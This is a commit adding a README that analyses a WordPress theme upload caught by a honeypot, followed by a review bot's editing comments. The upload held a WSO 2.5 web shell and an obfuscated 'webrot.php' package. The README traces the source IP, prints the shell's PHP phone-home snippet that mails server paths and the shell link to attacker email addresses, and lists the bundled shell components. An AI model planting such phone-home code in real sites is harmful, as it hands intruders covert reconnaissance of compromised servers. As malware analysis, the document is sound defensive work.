Commit
1 parent e3e6203, commit 581e15f. Showing 1 changed file with 96 additions and 0 deletions.
@@ -0,0 +1,96 @@ | ||
# Kinked theme named activex | ||
|
||
A theme with a WSO 2.5 web shell, which itself has a phone-home, | ||
and a | ||
|
||
The `webrot.php` file also appears on [pastebin](https://pastebin.com/Md5U41ME), | ||
dated Dec 30, 2013. | ||
Five years floating around. | ||
|
||
## Origin | ||
|
||
### IP Address 195.142.179.223 | ||
|
||
IP address 195.142.179.223 has DNS name of host-195-142-179-223.reverse.superonline.net. | ||
|
||
host-195-142-179-223.reverse.superonline.net does not have an A record | ||
|
||
`geoiplookup` says: GeoIP Country Edition: TR, Turkey | ||
|
||
% Information related to '195.142.179.0/24AS34984' | ||
route: 195.142.179.0/24 | ||
descr: SOL-BNG | ||
origin: AS34984 | ||
mnt-by: MNT-TELLCOM | ||
mnt-routes: MNT-TELLCOM | ||
created: 2014-04-14T13:30:03Z | ||
last-modified: 2014-04-14T13:30:03Z | ||
source: RIPE | ||
|
||
MNT-TELLCOM is apparently an ISP in Istanbul. | ||
|
||
The last IP address to respond on a traceroute to 195.142.179.223 is 46.33.86.46, | ||
apparently located in Germany. | ||
|
||
### Download | ||
|
||
Downloaded to a WordPress honey pot as a theme upload. | ||
The attacker(s) sent a zip-format file, which apparently has a | ||
real WordPress theme in it, | ||
|
||
All the files have a date of Aug 1, 2013, | ||
except for `webrot.php` | ||
and `images.php` | ||
|
||
## Deofbuscation | ||
|
||
`images.php` was merely base64-encoded, only one layer of | ||
obfuscation. | ||
|
||
`webrot.php` had a more intricate obfuscation, | ||
which it shares with other malware I've caught. | ||
See [A common encoding](../common_encoding) for details. | ||
|
||
## Analysis | ||
|
||
`images.php` is a Web Shell by oRb (WSO) version 2.5, | ||
complete with a phone-home: | ||
|
||
$me=base64_decode("ZmVyaWQyM0BnbWFpbC5jb20="); | ||
$thm="Server"; | ||
$fuck="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n"; | ||
$fuck.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n"; | ||
$fuck.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n"; | ||
$fuck.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n"; | ||
$fuck.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n"; | ||
mail($me, $thm, $fuck); | ||
|
||
`$me` ends up containing the email address "ferid23@gmail.com". | ||
I see this email address associated with a 2014 [Russian account](https://notessysadmin.com/kak-ayyildiz-team-slomali-moj-blog) of | ||
Turkish hackers Ayyildiz Tim "breaking" a blog. | ||
That reconciles with the Turkish ISP or telecom for the IP address this | ||
attack came from. | ||
|
||
At least this is a new phone-home, not just a decoded "wsobuff" from WSO 2.5.1 | ||
with a different "to" address. Props to ferid23@gmail.com for that effort. | ||
|
||
`webrot.php` is slightly more interesting. | ||
|
||
It phones home to mymktmymkt@gmail.com and tokmaktokmak1@gmail.com | ||
with the same information that `images.php` sends to ol' ferid23@gmail.com | ||
tokmaktokmak1@gmail.com appears on a [pastebin](https://pastebin.com/Md5U41ME), | ||
on a [Turkish security site](https://www.turkhackteam.org/web-server-guvenligi/1140416-webr00t-shell-decode.html) | ||
and a few others. | ||
|
||
`webrot.php` contains a number of base64-encoded pieces of source: | ||
|
||
* Perl file `web.root` - a Perl web shell? | ||
* PHP file `cmd.php` | ||
* PHP file `litebypass.php` | ||
* PHP file `mass.php` | ||
* PHP file `wpindex.php` - Frenchish variable names? | ||
|
||
Lots of "coded by WebRooT" comments throughout, | ||
but very uneven coding style and naming conventions. | ||
Some output is Turkish, some is English. | ||
Looks like "WebRooT" put this package together from pre-existing code. |
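Review bot: two sentences in the new README are cut off mid-thought and read as drafting leftovers: the intro paragraph ends with `and a` right after "which itself has a phone-home," and the "### Download" paragraph ends with `real WordPress theme in it,`; either finish them (what else the theme carries, what the zip contained besides the theme) or drop the dangling fragments. Smaller points in the same file: the heading `## Deofbuscation` should read `## Deobfuscation`; the phone-home snippet beginning `$me=base64_decode("ZmVyaWQyM0BnbWFpbC5jb20=");` is not inside a fenced code block, so Markdown will run those eight lines together into one paragraph and the `\r\n` escapes and `$_SERVER[...]` indexes will be hard to read, so wrap it in a fenced block tagged php; and the sentence ending `...that `images.php` sends to ol' ferid23@gmail.com` is missing its full stop before `tokmaktokmak1@gmail.com appears on a pastebin`, which currently merges two claims into one run-on.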